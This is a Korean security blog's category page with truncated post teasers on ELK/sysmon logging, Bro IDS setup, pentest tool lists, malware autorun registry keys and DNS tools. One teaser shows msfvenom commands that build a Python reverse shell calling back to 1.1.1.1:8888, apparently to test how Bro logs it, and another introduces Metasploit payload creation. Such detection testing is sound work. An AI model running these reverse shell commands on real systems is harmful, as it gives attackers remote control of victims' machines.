security 썸네일형 리스트형 sysmon + winlogbeat + elastic stack 1. elastic부터 elk 설치 메뉴얼: https://www.elastic.co/guide/en/elastic-stack-get-started/7.2/get-started-elastic-stack.html#install-elasticsearch Getting started with the Elastic Stack | Getting Started [7.2] | Elastic If you don’t see data in Kibana, try changing the date range to a larger range. By default, Kibana shows the last 15 minutes. If you see errors, make sure Metricbeat is running, then re.. 더보기 정보보안에서의 인공지능 도입 분야와 주요 사업자 - KISA :: 정보보안에서의 인공지능 도입 분야와 주요 사업자(KISA) 요약 :: + 인공지능 오픈소스 구글 텐서플로 (www.tensorflow.org) - python, java, c, go, javascript library 지원 - OS: Windows, Linux, MAC, 라즈베리파이 IBM 시스템ML systemml.apache.org MS Cognitive Toolkit (CNTK) github.com/Microsoft/CNTK NVIDIA cuDNN, DL4J, Caffe + FACT - 방대한 정보보안 관련 인터넷 지식들을 모두 검색하여 이해하고 패턴화시키는건 힘든 노가다 - 악성코드의 증가율 역시 다양한 변종의 출현과 함께 매번 새로운 기록 갱신중 - 분석해야 할 데이터 량의 급속한 증가는 .. 더보기 mac osx reverse shell 테스트 및 bro 로그 확인 reverse shell 통신시 bro에 로그가 어떻게 남는지 확인하기 위해 테스트 한 내용이다. + 테스트 환경- kali linux(attacker pc)- mac osx mojave(victim pc) 1. Attacker PC - metasploit 실행후 reverse shell 파일 생성msf > use exploit/multi/handler msf exploit(handler) > msfvenom -p cmd/unix/reverse_python LHOST=1.1.1.1 LPORT=8888 > -f raw > shell.py [*] exec: msfvenom -p cmd/unix/reverse_python LHOST=1.1.1.1 LPORT=8888 > -f raw > shell.py No p.. 더보기 Creating Metasploit Payloads Creating Metasploit PayloadsPeleusOften one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant paylo.. 더보기 침투테스터를 위한 파이썬 오픈소스 도구 소개 1) 웹 어플리케이션 모의해킹 이름설명URLwapiti웹 취약점 스캐너http://wapiti.sourceforge.net/w3af웹 취약점 스캐너http://w3af.org/category/pythonV3n0M-Scanner웹 취약점 스캐너https://github.com/v3n0m-Scanner/V3n0M-ScannerxsserXSS 취약점 스캐너http://xsser.sourceforge.net/sqlmapSQL 인젝션 점검 도구http://sqlmap.org/spiderfoot웹서버 풋프린팅 분석http://sourceforge.net/projects/spiderfoot/Parsero웹사이트 디렉터리 탐색https://github.com/behindthefirewalls/Parserodnsreco.. 더보기 ASCII Codes in Hex, Decimal This is a table that compare decimal numbers, ArtNet, Hex and ASCII. // help.malighting.com 더보기 CentOS에서 BRO+PF_RING 설치하기 참고: https://www.bro.org/sphinx-git/configuration/index.html # cmake 설치yum install cmake28 # ipsumdump 설치wget http://www.read.seas.harvard.edu/~kohler/ipsumdump/ipsumdump-1.85.tar.gztar -zxvf ipsumdump-1.85.tar.gz cd ipsumdump-1.85 ./configure make && make install # 기타 필요 모듈 설치yum install kernel-devel kernel-headers -y yum install make autoconf automake gcc gcc-c++ flex bison libpcap libpcap-deve.. 더보기 악성코드 자동실행 Registry 자동 시작 Registry 위치HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ All values in this key are executed.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\ All values in this key are executed, and then their autostart reference is deleted.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ All values in this key are executed as services.HKEY.. 더보기 nslookup, dig 사용하기 [root@s92 etc]# nslookup > www.ttl.co.kr Server: 211.63.64.11 우리꺼 네임서버 Address: 211.63.64.11#53 (포트)Non-authoritative answer: Name: www.ttl.co.kr Address: 203.236.17.23> set querytype=ns > www.ttl.co.kr Server: 211.63.64.11 Address: 211.63.64.11#53Non-authoritative answer: ttl.co.kr nameserver = gate.sktelecom.com. ttl.co.kr nameserver = gate2.sktelecom.com.Authoritative answers can be found fro.. 더보기 umask란? 1. umask란? 솔라리스에서는 여러 가지 환경 설정 파일을 제공하는데, 이것은 사용자를 더욱 자유롭고 융통성 있게 만들어 준다. 이런 파일들은 보통 홈디렉토리안에 위치하고 있으며, '.'으로 시작 하는 파일들을 말한다. 'ls -a' 명령으로 파일의 존재를 확인할 수 있으며, 파일의 이름은 "Resource Configuration"이라는 의미의 "rc"라는 스펠링으로 끝나는 경우가 많다. Umask는 처음 파일이나 디렉토리를 만들면 파일이나 디렉토리에 대한 기본적인 권한(permission)이 자동설정 되는데, 이러한 것은 시스템파일의 umask에 의하여 결정이 된다. umask는 .profile, .cshrc, .bashrc, .login과 같은 사용자 프로파일에서 설정한다. 2. umask의 사.. 더보기 이전 1 2 3 4 5 다음
